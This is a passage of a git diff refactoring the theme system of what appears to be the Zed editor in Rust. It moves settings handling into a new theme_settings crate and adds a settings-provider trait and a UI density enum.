syntax_theme::SyntaxTheme; diff --git a/crates/theme/src/theme.rs b/crates/theme/src/theme.rs index ca330beee3c9604278ce187e0609f60fbc58170e..faa18bd3ce9ed71f4afed6d21d577d48b14680fb 100644 --- a/crates/theme/src/theme.rs +++ b/crates/theme/src/theme.rs @@ -16,42 +16,34 @@ mod icon_theme_schema; mod registry; mod scale; mod schema; -mod settings; mod styles; +mod theme_settings_provider; +mod ui_density; -use std::path::Path; use std::sync::Arc; -use ::settings::DEFAULT_DARK_THEME; -use ::settings::IntoGpui; -use ::settings::Settings; -use ::settings::SettingsStore; -use anyhow::Result; -use fallback_themes::apply_status_color_defaults; -use fs::Fs; +use derive_more::{Deref, DerefMut}; use gpui::BorrowAppContext; use gpui::Global; use gpui::{ - App, AssetSource, HighlightStyle, Hsla, Pixels, Refineable, SharedString, WindowAppearance, - WindowBackgroundAppearance, px, + App, AssetSource, Hsla, Pixels, SharedString, WindowAppearance, WindowBackgroundAppearance, px, }; use serde::Deserialize; -use uuid::Uuid; pub use crate::default_colors::*; -use crate::fallback_themes::apply_theme_color_defaults; +pub use crate::fallback_themes::{apply_status_color_defaults, apply_theme_color_defaults}; pub use crate::font_family_cache::*; pub use crate::icon_theme::*; pub use crate::icon_theme_schema::*; pub use crate::registry::*; pub use crate::scale::*; pub use crate::schema::*; -pub use crate::settings::*; pub use crate::styles::*; -pub use ::settings::{ - FontStyleContent, HighlightStyleContent, StatusColorsContent, ThemeColorsContent, - ThemeStyleContent, -}; +pub use crate::theme_settings_provider::*; +pub use crate::ui_density::*; + +/// The name of the default dark theme. +pub const DEFAULT_DARK_THEME: &str = "One Dark"; /// Defines window border radius for platforms that use client side decorations. pub const CLIENT_SIDE_DECORATION_ROUNDING: Pixels = px(10.0); @@ -86,15 +78,6 @@ impl From for Appearance { } } -impl From for ThemeAppearanceMode { - fn from(value: Appearance) -> Self { - match value { - Appearance::Light => Self::Light, - Appearance::Dark => Self::Dark, - } - } -} - /// Which themes should be loaded. This is used primarily for testing. pub enum LoadThemes { /// Only load the base theme. @@ -106,84 +89,31 @@ pub enum LoadThemes { All(Box), } -/// Initialize the theme system. +/// Initialize the theme system with default themes. +/// +/// This sets up the [`ThemeRegistry`], [`FontFamilyCache`], [`SystemAppearance`], +/// and [`GlobalTheme`] with the default dark theme. It does NOT load bundled +/// themes from JSON or integrate with settings — use `theme_settings::init` for that. pub fn init(themes_to_load: LoadThemes, cx: &mut App) { SystemAppearance::init(cx); - let (assets, load_user_themes) = match themes_to_load { - LoadThemes::JustBase => (Box::new(()) as Box, false), - LoadThemes::All(assets) => (assets, true), + let assets = match themes_to_load { + LoadThemes::JustBase => Box::new(()) as Box, + LoadThemes::All(assets) => assets, }; ThemeRegistry::set_global(assets, cx); - - if load_user_themes { - ThemeRegistry::global(cx).load_bundled_themes(); - } - FontFamilyCache::init_global(cx); - let theme = GlobalTheme::configured_theme(cx); - let icon_theme = GlobalTheme::configured_icon_theme(cx); + let themes = ThemeRegistry::default_global(cx); + let theme = themes.get(DEFAULT_DARK_THEME).unwrap_or_else(|_| { + themes + .list() + .into_iter() + .next() + .map(|m| themes.get(&m.name).unwrap()) + .unwrap() + }); + let icon_theme = themes.default_icon_theme().unwrap(); cx.set_global(GlobalTheme { theme, icon_theme }); - - let settings = ThemeSettings::get_global(cx); - - let mut prev_buffer_font_size_settings = settings.buffer_font_size_settings(); - let mut prev_ui_font_size_settings = settings.ui_font_size_settings(); - let mut prev_agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); - let mut prev_agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); - let mut prev_theme_name = settings.theme.name(SystemAppearance::global(cx).0); - let mut prev_icon_theme_name = settings.icon_theme.name(SystemAppearance::global(cx).0); - let mut prev_theme_overrides = ( - settings.experimental_theme_overrides.clone(), - settings.theme_overrides.clone(), - ); - - cx.observe_global::(move |cx| { - let settings = ThemeSettings::get_global(cx); - - let buffer_font_size_settings = settings.buffer_font_size_settings(); - let ui_font_size_settings = settings.ui_font_size_settings(); - let agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); - let agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); - let theme_name = settings.theme.name(SystemAppearance::global(cx).0); - let icon_theme_name = settings.icon_theme.name(SystemAppearance::global(cx).0); - let theme_overrides = ( - settings.experimental_theme_overrides.clone(), - settings.theme_overrides.clone(), - ); - - if buffer_font_size_settings != prev_buffer_font_size_settings { - prev_buffer_font_size_settings = buffer_font_size_settings; - reset_buffer_font_size(cx); - } - - if ui_font_size_settings != prev_ui_font_size_settings { - prev_ui_font_size_settings = ui_font_size_settings; - reset_ui_font_size(cx); - } - - if agent_ui_font_size_settings != prev_agent_ui_font_size_settings { - prev_agent_ui_font_size_settings = agent_ui_font_size_settings; - reset_agent_ui_font_size(cx); - } - - if agent_buffer_font_size_settings != prev_agent_buffer_font_size_settings { - prev_agent_buffer_font_size_settings = agent_buffer_font_size_settings; - reset_agent_buffer_font_size(cx); - } - - if theme_name != prev_theme_name || theme_overrides != prev_theme_overrides { - prev_theme_name = theme_name; - prev_theme_overrides = theme_overrides; - GlobalTheme::reload_theme(cx); - } - - if icon_theme_name != prev_icon_theme_name { - prev_icon_theme_name = icon_theme_name; - GlobalTheme::reload_icon_theme(cx); - } - }) - .detach(); } /// Implementing this trait allows accessing the active theme. @@ -198,6 +128,39 @@ impl ActiveTheme for App { } } +/// The appearance of the system. +#[derive(Debug, Clone, Copy, Deref)] +pub struct SystemAppearance(pub Appearance); + +impl Default for SystemAppearance { + fn default() -> Self { + Self(Appearance::Dark) + } +} + +#[derive(Deref, DerefMut, Default)] +struct GlobalSystemAppearance(SystemAppearance); + +impl Global for GlobalSystemAppearance {} + +impl SystemAppearance { + /// Initializes the [`SystemAppearance`] for the application. + pub fn init(cx: &mut App) { + *cx.default_global::() = + GlobalSystemAppearance(SystemAppearance(cx.window_appearance().into())); + } + + /// Returns the global [`SystemAppearance`]. + pub fn global(cx: &App) -> Self { + cx.global::().0 + } + + /// Returns a mutable reference to the global [`SystemAppearance`]. + pub fn global_mut(cx: &mut App) -> &mut Self { + cx.global_mut::() + } +} + /// A theme family is a grouping of themes under a single name. /// /// For example, the "One" theme family contains the "One Light" and "One Dark" themes. @@ -219,118 +182,6 @@ pub struct ThemeFamily { pub scales: ColorScales, } -impl ThemeFamily { - // This is on ThemeFamily because we will have variables here we will need - // in the future to resolve @references. - /// Refines ThemeContent into a theme, merging it's contents with the base theme. - pub fn refine_theme(&self, theme: &ThemeContent) -> Theme { - let appearance = match theme.appearance { - AppearanceContent::Light => Appearance::Light, - AppearanceContent::Dark => Appearance::Dark, - }; - - let mut refined_status_colors = match theme.appearance { - AppearanceContent::Light => StatusColors::light(), - AppearanceContent::Dark => StatusColors::dark(), - }; - let mut status_colors_refinement = status_colors_refinement(&theme.style.status); - apply_status_color_defaults(&mut status_colors_refinement); - refined_status_colors.refine(&status_colors_refinement); - - let mut refined_player_colors = match theme.appearance { - AppearanceContent::Light => PlayerColors::light(), - AppearanceContent::Dark => PlayerColors::dark(), - }; - refined_player_colors.merge(&theme.style.players); - - let mut refined_theme_colors = match theme.appearance { - AppearanceContent::Light => ThemeColors::light(), - AppearanceContent::Dark => ThemeColors::dark(), - }; - let mut theme_colors_refinement = - theme_colors_refinement(&theme.style.colors, &status_colors_refinement); - apply_theme_color_defaults(&mut theme_colors_refinement, &refined_player_colors); - refined_theme_colors.refine(&theme_colors_refinement); - - let mut refined_accent_colors = match theme.appearance { - AppearanceContent::Light => AccentColors::light(), - AppearanceContent::Dark => AccentColors::dark(), - }; - refined_accent_colors.merge(&theme.style.accents); - - let syntax_highlights = theme - .style - .syntax - .iter() - .map(|(syntax_token, highlight)| { - ( - syntax_token.clone(), - HighlightStyle { - color: highlight - .color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - background_color: highlight - .background_color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - font_style: highlight.font_style.map(|s| s.into_gpui()), - font_weight: highlight.font_weight.map(|w| w.into_gpui()), - ..Default::default() - }, - ) - }) - .collect::>(); - let syntax_theme = SyntaxTheme::merge(Arc::new(SyntaxTheme::default()), syntax_highlights); - - let window_background_appearance = theme - .style - .window_background_appearance - .map(|w| w.into_gpui()) - .unwrap_or_default(); - - Theme { - id: uuid::Uuid::new_v4().to_string(), - name: theme.name.clone().into(), - appearance, - styles: ThemeStyles { - system: SystemColors::default(), - window_background_appearance, - accents: refined_accent_colors, - colors: refined_theme_colors, - status: refined_status_colors, - player: refined_player_colors, - syntax: syntax_theme, - }, - } - } -} - -/// Refines a [ThemeFamilyContent] and it's [ThemeContent]s into a [ThemeFamily]. -pub fn refine_theme_family(theme_family_content: ThemeFamilyContent) -> ThemeFamily { - let id = Uuid::new_v4().to_string(); - let name = theme_family_content.name.clone(); - let author = theme_family_content.author.clone(); - - let mut theme_family = ThemeFamily { - id, - name: name.into(), - author: author.into(), - themes: vec![], - scales: default_color_scales(), - }; - - let refined_themes = theme_family_content - .themes - .iter() - .map(|theme_content| theme_family.refine_theme(theme_content)) - .collect(); - - theme_family.themes = refined_themes; - - theme_family -} - /// A theme is the primary mechanism for defining the appearance of the UI. #[derive(Clone, Debug, PartialEq)] pub struct Theme { @@ -381,12 +232,6 @@ impl Theme { &self.styles.status } - /// Returns the color for the syntax node with the given name. - #[inline(always)] - pub fn syntax_color(&self, name: &str) -> Hsla { - self.syntax().color(name) - } - /// Returns the [`Appearance`] for the theme. #[inline(always)] pub fn appearance(&self) -> Appearance { @@ -416,40 +261,14 @@ impl Theme { } } -/// Asynchronously reads the user theme from the specified path. -pub async fn read_user_theme(theme_path: &Path, fs: Arc) -> Result { - let bytes = fs.load_bytes(theme_path).await?; - let theme_family: ThemeFamilyContent = serde_json_lenient::from_slice(&bytes)?; - - for theme in &theme_family.themes { - if theme - .style - .colors - .deprecated_scrollbar_thumb_background - .is_some() - { - log::warn!( - r#"Theme "{theme_name}" is using a deprecated style property: scrollbar_thumb.background. Use `scrollbar.thumb.background` instead."#, - theme_name = theme.name - ) - } - } - - Ok(theme_family) -} - -/// Asynchronously reads the icon theme from the specified path. -pub async fn read_icon_theme( - icon_theme_path: &Path, - fs: Arc, -) -> Result { - let bytes = fs.load_bytes(icon_theme_path).await?; - let icon_theme_family: IconThemeFamilyContent = serde_json_lenient::from_slice(&bytes)?; +/// Deserializes an icon theme from the given bytes. +pub fn deserialize_icon_theme(bytes: &[u8]) -> anyhow::Result { + let icon_theme_family: IconThemeFamilyContent = serde_json_lenient::from_slice(bytes)?; Ok(icon_theme_family) } -/// The active theme +/// The active theme. pub struct GlobalTheme { theme: Arc, icon_theme: Arc, @@ -457,72 +276,27 @@ pub struct GlobalTheme { impl Global for GlobalTheme {} impl GlobalTheme { - fn configured_theme(cx: &mut App) -> Arc { - let themes = ThemeRegistry::default_global(cx); - let theme_settings = ThemeSettings::get_global(cx); - let system_appearance = SystemAppearance::global(cx); - - let theme_name = theme_settings.theme.name(*system_appearance); - - let theme = match themes.get(&theme_name.0) { - Ok(theme) => theme, - Err(err) => { - if themes.extensions_loaded() { - log::error!("{err}"); - } - themes - .get(default_theme(*system_appearance)) - // fallback for tests. - .unwrap_or_else(|_| themes.get(DEFAULT_DARK_THEME).unwrap()) - } - }; - theme_settings.apply_theme_overrides(theme) + /// Creates a new [`GlobalTheme`] with the given theme and icon theme. + pub fn new(theme: Arc, icon_theme: Arc) -> Self { + Self { theme, icon_theme } } - /// Reloads the current theme. - /// - /// Reads the [`ThemeSettings`] to know which theme should be loaded, - /// taking into account the current [`SystemAppearance`]. - pub fn reload_theme(cx: &mut App) { - let theme = Self::configured_theme(cx); + /// Updates the active theme. + pub fn update_theme(cx: &mut App, theme: Arc) { cx.update_global::(|this, _| this.theme = theme); - cx.refresh_windows(); - } - - fn configured_icon_theme(cx: &mut App) -> Arc { - let themes = ThemeRegistry::default_global(cx); - let theme_settings = ThemeSettings::get_global(cx); - let system_appearance = SystemAppearance::global(cx); - - let icon_theme_name = theme_settings.icon_theme.name(*system_appearance); - - match themes.get_icon_theme(&icon_theme_name.0) { - Ok(theme) => theme, - Err(err) => { - if themes.extensions_loaded() { - log::error!("{err}"); - } - themes.get_icon_theme(DEFAULT_ICON_THEME_NAME).unwrap() - } - } } - /// Reloads the current icon theme. - /// - /// Reads the [`ThemeSettings`] to know which icon theme should be loaded, - /// taking into account the current [`SystemAppearance`]. - pub fn reload_icon_theme(cx: &mut App) { - let icon_theme = Self::configured_icon_theme(cx); + /// Updates the active icon theme. + pub fn update_icon_theme(cx: &mut App, icon_theme: Arc) { cx.update_global::(|this, _| this.icon_theme = icon_theme); - cx.refresh_windows(); } - /// the active theme + /// Returns the active theme. pub fn theme(cx: &App) -> &Arc { &cx.global::().theme } - /// the active icon theme + /// Returns the active icon theme. pub fn icon_theme(cx: &App) -> &Arc { &cx.global::().icon_theme } diff --git a/crates/theme/src/theme_settings_provider.rs b/crates/theme/src/theme_settings_provider.rs new file mode 100644 index 0000000000000000000000000000000000000000..f3e05bc77bdd91de46024951aa3bef1f01736502 --- /dev/null +++ b/crates/theme/src/theme_settings_provider.rs @@ -0,0 +1,43 @@ +use gpui::{App, Font, Global, Pixels}; + +use crate::UiDensity; + +/// Trait for providing theme-related settings (fonts, font sizes, UI density) +/// without coupling to the concrete settings infrastructure. +/// +/// A concrete implementation is registered as a global by the `theme_settings` crate. +pub trait ThemeSettingsProvider: Send + Sync + 'static { + /// Returns the font used for UI elements. + fn ui_font<'a>(&'a self, cx: &'a App) -> &'a Font; + + /// Returns the font used for buffers and the terminal. + fn buffer_font<'a>(&'a self, cx: &'a App) -> &'a Font; + + /// Returns the UI font size in pixels. + fn ui_font_size(&self, cx: &App) -> Pixels; + + /// Returns the buffer font size in pixels. + fn buffer_font_size(&self, cx: &App) -> Pixels; + + /// Returns the current UI density setting. + fn ui_density(&self, cx: &App) -> UiDensity; +} + +struct GlobalThemeSettingsProvider(Box); + +impl Global for GlobalThemeSettingsProvider {} + +/// Registers the global [`ThemeSettingsProvider`] implementation. +/// +/// This should be called during application initialization by the crate +/// that owns the concrete theme settings (e.g. `theme_settings`). +pub fn set_theme_settings_provider(provider: Box, cx: &mut App) { + cx.set_global(GlobalThemeSettingsProvider(provider)); +} + +/// Returns the global [`ThemeSettingsProvider`]. +/// +/// Panics if no provider has been registered via [`set_theme_settings_provider`]. +pub fn theme_settings(cx: &App) -> &dyn ThemeSettingsProvider { + &*cx.global::().0 +} diff --git a/crates/theme/src/ui_density.rs b/crates/theme/src/ui_density.rs new file mode 100644 index 0000000000000000000000000000000000000000..5510e330e55c5b63ca125ff3be9dad2f0357e5c2 --- /dev/null +++ b/crates/theme/src/ui_density.rs @@ -0,0 +1,65 @@ +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +/// Specifies the density of the UI. +/// Note: This setting is still experimental. See [this tracking issue](https://github.com/zed-industries/zed/issues/18078) +#[derive( + Debug, + Default, + PartialEq, + Eq, + PartialOrd, + Ord, + Hash, + Clone, + Copy, + Serialize, + Deserialize, + JsonSchema, +)] +#[serde(rename_all = "snake_case")] +pub enum UiDensity { + /// A denser UI with tighter spacing and smaller elements. + #[serde(alias = "compact")] + Compact, + #[default] + #[serde(alias = "default")] + /// The default UI density. + Default, + #[serde(alias = "comfortable")] + /// A looser UI with more spacing and larger elements. + Comfortable, +} + +impl UiDensity { + /// The spacing ratio of a given density. + /// TODO: Standardize usage throughout the app or remove + pub fn spacing_ratio(self) -> f32 { + match self { + UiDensity::Compact => 0.75, + UiDensity::Default => 1.0, + UiDensity::Comfortable => 1.25, + } + } +} + +impl From for UiDensity { + fn from(s: String) -> Self { + match s.as_str() { + "compact" => Self::Compact, + "default" => Self::Default, + "comfortable" => Self::Comfortable, + _ => Self::default(), + } + } +} + +impl From for String { + fn from(val: UiDensity) -> Self { + match val { + UiDensity::Compact => "compact".to_string(), + UiDensity::Default => "default".to_string(), + UiDensity::Comfortable => "comfortable".to_string(), + } + } +} diff --git a/crates/theme_extension/Cargo.toml b/crates/theme_extension/Cargo.toml index d94e15914b2dfbc8250641e8957366c27c2616a4..ca5b71de20b2166b81a14b79d81f581027245d6a 100644 --- a/crates/theme_extension/Cargo.toml +++ b/crates/theme_extension/Cargo.toml @@ -17,3 +17,4 @@ extension.workspace = true fs.workspace = true gpui.workspace = true theme.workspace = true +theme_settings.workspace = true diff --git a/crates/theme_extension/src/theme_extension.rs b/crates/theme_extension/src/theme_extension.rs index 10df2349c86decbadaa010778a95d04af36a6aab..85351a91f37a5b776b9db0f0bbbc4c05d3fc4616 100644 --- a/crates/theme_extension/src/theme_extension.rs +++ b/crates/theme_extension/src/theme_extension.rs @@ -5,7 +5,8 @@ use anyhow::Result; use extension::{ExtensionHostProxy, ExtensionThemeProxy}; use fs::Fs; use gpui::{App, BackgroundExecutor, SharedString, Task}; -use theme::{GlobalTheme, ThemeRegistry}; +use theme::{ThemeRegistry, deserialize_icon_theme}; +use theme_settings; pub fn init( extension_host_proxy: Arc, @@ -30,7 +31,8 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { fn list_theme_names(&self, theme_path: PathBuf, fs: Arc) -> Task>> { self.executor.spawn(async move { - let themes = theme::read_user_theme(&theme_path, fs).await?; + let themes = + theme_settings::deserialize_user_theme(&fs.load_bytes(&theme_path).await?)?; Ok(themes.themes.into_iter().map(|theme| theme.name).collect()) }) } @@ -41,12 +43,13 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { fn load_user_theme(&self, theme_path: PathBuf, fs: Arc) -> Task> { let theme_registry = self.theme_registry.clone(); - self.executor - .spawn(async move { theme_registry.load_user_theme(&theme_path, fs).await }) + self.executor.spawn(async move { + theme_settings::load_user_theme(&theme_registry, &fs.load_bytes(&theme_path).await?) + }) } fn reload_current_theme(&self, cx: &mut App) { - GlobalTheme::reload_theme(cx) + theme_settings::reload_theme(cx) } fn list_icon_theme_names( @@ -55,7 +58,8 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { fs: Arc, ) -> Task>> { self.executor.spawn(async move { - let icon_theme_family = theme::read_icon_theme(&icon_theme_path, fs).await?; + let icon_theme_family = + theme::deserialize_icon_theme(&fs.load_bytes(&icon_theme_path).await?)?; Ok(icon_theme_family .themes .into_iter() @@ -76,13 +80,13 @@ impl ExtensionThemeProxy for ThemeRegistryProxy { ) -> Task> { let theme_registry = self.theme_registry.clone(); self.executor.spawn(async move { - theme_registry - .load_icon_theme(&icon_theme_path, &icons_root_dir, fs) - .await + let icon_theme_family = + deserialize_icon_theme(&fs.load_bytes(&icon_theme_path).await?)?; + theme_registry.load_icon_theme(icon_theme_family, &icons_root_dir) }) } fn reload_current_icon_theme(&self, cx: &mut App) { - GlobalTheme::reload_icon_theme(cx) + theme_settings::reload_icon_theme(cx) } } diff --git a/crates/theme_importer/Cargo.toml b/crates/theme_importer/Cargo.toml index a91ffc44544f898be35c4514910a6081b10b4a26..a0b86a286de965143ba3ade4ee4cdff56cf773d4 100644 --- a/crates/theme_importer/Cargo.toml +++ b/crates/theme_importer/Cargo.toml @@ -22,4 +22,5 @@ serde_json_lenient.workspace = true simplelog.workspace= true strum = { workspace = true, features = ["derive"] } theme.workspace = true +theme_settings.workspace = true vscode_theme = "0.2.0" diff --git a/crates/theme_importer/src/vscode/converter.rs b/crates/theme_importer/src/vscode/converter.rs index b052e865265368234d7a1bed42957a714ca9d5bb..70b7c0e9f663c64d73cf9360dd7733c12f1fb5fe 100644 --- a/crates/theme_importer/src/vscode/converter.rs +++ b/crates/theme_importer/src/vscode/converter.rs @@ -1,7 +1,7 @@ use anyhow::Result; use collections::IndexMap; use strum::IntoEnumIterator; -use theme::{ +use theme_settings::{ FontStyleContent, FontWeightContent, HighlightStyleContent, StatusColorsContent, ThemeColorsContent, ThemeContent, ThemeStyleContent, WindowBackgroundContent, }; diff --git a/crates/theme_selector/Cargo.toml b/crates/theme_selector/Cargo.toml index 1a563e81f202b484c846ed620aee3edd122fc80b..41e0e7681436f1fd8d6bfe743528af7d4f3d3ad6 100644 --- a/crates/theme_selector/Cargo.toml +++ b/crates/theme_selector/Cargo.toml @@ -22,6 +22,7 @@ serde.workspace = true settings.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/theme_selector/src/icon_theme_selector.rs b/crates/theme_selector/src/icon_theme_selector.rs index 2ea3436d43cd2d2a4bda392384ff51f962824143..13d6a87c4ac9911bef7a86c9df84171644ca6cf9 100644 --- a/crates/theme_selector/src/icon_theme_selector.rs +++ b/crates/theme_selector/src/icon_theme_selector.rs @@ -7,10 +7,8 @@ use gpui::{ use picker::{Picker, PickerDelegate}; use settings::{Settings as _, SettingsStore, update_settings_file}; use std::sync::Arc; -use theme::{ - Appearance, IconThemeName, IconThemeSelection, SystemAppearance, ThemeMeta, ThemeRegistry, - ThemeSettings, -}; +use theme::{Appearance, SystemAppearance, ThemeMeta, ThemeRegistry}; +use theme_settings::{IconThemeName, IconThemeSelection, ThemeSettings}; use ui::{ListItem, ListItemSpacing, prelude::*, v_flex}; use util::ResultExt; use workspace::{ModalView, ui::HighlightedLabel}; @@ -176,7 +174,7 @@ impl PickerDelegate for IconThemeSelectorDelegate { let appearance = Appearance::from(window.appearance()); update_settings_file(self.fs.clone(), cx, move |settings, _| { - theme::set_icon_theme(settings, theme_name, appearance); + theme_settings::set_icon_theme(settings, theme_name, appearance); }); self.selector @@ -311,10 +309,11 @@ impl PickerDelegate for IconThemeSelectorDelegate { .border_color(cx.theme().colors().border_variant) .child( Button::new("docs", "View Icon Theme Docs") - .icon(IconName::ArrowUpRight) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(|_event, _window, cx| { cx.open_url("https://zed.dev/docs/icon-themes"); }), diff --git a/crates/theme_selector/src/theme_selector.rs b/crates/theme_selector/src/theme_selector.rs index 74b242dd0b7c3a3ddbe6ca76d34a59f03560f14a..fb4d68a9da6f4a96e52fef288e58bdec90cae6fa 100644 --- a/crates/theme_selector/src/theme_selector.rs +++ b/crates/theme_selector/src/theme_selector.rs @@ -9,9 +9,9 @@ use gpui::{ use picker::{Picker, PickerDelegate}; use settings::{Settings, SettingsStore, update_settings_file}; use std::sync::Arc; -use theme::{ - Appearance, SystemAppearance, Theme, ThemeAppearanceMode, ThemeMeta, ThemeName, ThemeRegistry, - ThemeSelection, ThemeSettings, +use theme::{Appearance, SystemAppearance, Theme, ThemeMeta, ThemeRegistry}; +use theme_settings::{ + ThemeAppearanceMode, ThemeName, ThemeSelection, ThemeSettings, appearance_to_mode, }; use ui::{ListItem, ListItemSpacing, prelude::*, v_flex}; use util::ResultExt; @@ -233,7 +233,7 @@ impl ThemeSelectorDelegate { /// Overrides the global (in-memory) theme settings. /// /// Note that this does **not** update the user's `settings.json` file (see the -/// [`ThemeSelectorDelegate::confirm`] method and [`theme::set_theme`] function). +/// [`ThemeSelectorDelegate::confirm`] method and [`theme_settings::set_theme`] function). fn override_global_theme( store: &mut SettingsStore, new_theme: &Theme, @@ -303,7 +303,7 @@ fn update_mode_if_new_appearance_is_different_from_system( if original_mode == &ThemeAppearanceMode::System && system_appearance == new_appearance { ThemeAppearanceMode::System } else { - ThemeAppearanceMode::from(new_appearance) + appearance_to_mode(new_appearance) } } @@ -360,7 +360,7 @@ impl PickerDelegate for ThemeSelectorDelegate { telemetry::event!("Settings Changed", setting = "theme", value = theme_name); update_settings_file(self.fs.clone(), cx, move |settings, _| { - theme::set_theme(settings, theme_name, theme_appearance, system_appearance); + theme_settings::set_theme(settings, theme_name, theme_appearance, system_appearance); }); self.selector @@ -497,10 +497,11 @@ impl PickerDelegate for ThemeSelectorDelegate { .border_color(cx.theme().colors().border_variant) .child( Button::new("docs", "View Theme Docs") - .icon(IconName::ArrowUpRight) - .icon_position(IconPosition::End) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(cx.listener(|_, _, _, cx| { cx.open_url("https://zed.dev/docs/themes"); })), diff --git a/crates/theme_settings/Cargo.toml b/crates/theme_settings/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..dfe4fa0f79fb437a2b03c680642ac6b19a91d251 --- /dev/null +++ b/crates/theme_settings/Cargo.toml @@ -0,0 +1,37 @@ +[package] +name = "theme_settings" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[features] +default = [] +test-support = ["gpui/test-support", "settings/test-support", "theme/test-support"] + +[lib] +path = "src/theme_settings.rs" +doctest = false + +[dependencies] +anyhow.workspace = true +collections.workspace = true +gpui.workspace = true +gpui_util.workspace = true +log.workspace = true +palette = { workspace = true, default-features = false, features = ["std"] } +refineable.workspace = true +schemars.workspace = true +serde.workspace = true +serde_json.workspace = true +serde_json_lenient.workspace = true +settings.workspace = true +theme.workspace = true +uuid.workspace = true + +[dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } +settings = { workspace = true, features = ["test-support"] } diff --git a/crates/theme_settings/LICENSE-GPL b/crates/theme_settings/LICENSE-GPL new file mode 120000 index 0000000000000000000000000000000000000000..89e542f750cd3860a0598eff0dc34b56d7336dc4 --- /dev/null +++ b/crates/theme_settings/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/theme_settings/src/schema.rs b/crates/theme_settings/src/schema.rs new file mode 100644 index 0000000000000000000000000000000000000000..93eb4d30aa7ace9e10da3a0002dae3c6a6907d21 --- /dev/null +++ b/crates/theme_settings/src/schema.rs @@ -0,0 +1,850 @@ +#![allow(missing_docs)] + +use gpui::{HighlightStyle, Hsla}; +use palette::FromColor; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use settings::IntoGpui; +pub use settings::{ + FontStyleContent, HighlightStyleContent, StatusColorsContent, ThemeColorsContent, + ThemeStyleContent, +}; +pub use settings::{FontWeightContent, WindowBackgroundContent}; + +use theme::{StatusColorsRefinement, ThemeColorsRefinement}; + +/// The content of a serialized theme family. +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +pub struct ThemeFamilyContent { + pub name: String, + pub author: String, + pub themes: Vec, +} + +/// The content of a serialized theme. +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] +pub struct ThemeContent { + pub name: String, + pub appearance: theme::AppearanceContent, + pub style: settings::ThemeStyleContent, +} + +/// Returns the syntax style overrides in the [`ThemeContent`]. +pub fn syntax_overrides(this: &settings::ThemeStyleContent) -> Vec<(String, HighlightStyle)> { + this.syntax + .iter() + .map(|(key, style)| { + ( + key.clone(), + HighlightStyle { + color: style + .color + .as_ref() + .and_then(|color| theme::try_parse_color(color).ok()), + background_color: style + .background_color + .as_ref() + .and_then(|color| theme::try_parse_color(color).ok()), + font_style: style.font_style.map(|s| s.into_gpui()), + font_weight: style.font_weight.map(|w| w.into_gpui()), + ..Default::default() + }, + ) + }) + .collect() +} + +pub fn status_colors_refinement(colors: &settings::StatusColorsContent) -> StatusColorsRefinement { + StatusColorsRefinement { + conflict: colors + .conflict + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + conflict_background: colors + .conflict_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + conflict_border: colors + .conflict_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + created: colors + .created + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + created_background: colors + .created_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + created_border: colors + .created_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + deleted: colors + .deleted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + deleted_background: colors + .deleted_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + deleted_border: colors + .deleted_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + error: colors + .error + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + error_background: colors + .error_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + error_border: colors + .error_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hidden: colors + .hidden + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hidden_background: colors + .hidden_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hidden_border: colors + .hidden_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hint: colors + .hint + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hint_background: colors + .hint_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + hint_border: colors + .hint_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ignored: colors + .ignored + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ignored_background: colors + .ignored_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ignored_border: colors + .ignored_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + info: colors + .info + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + info_background: colors + .info_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + info_border: colors + .info_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + modified: colors + .modified + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + modified_background: colors + .modified_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + modified_border: colors + .modified_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + predictive: colors + .predictive + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + predictive_background: colors + .predictive_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + predictive_border: colors 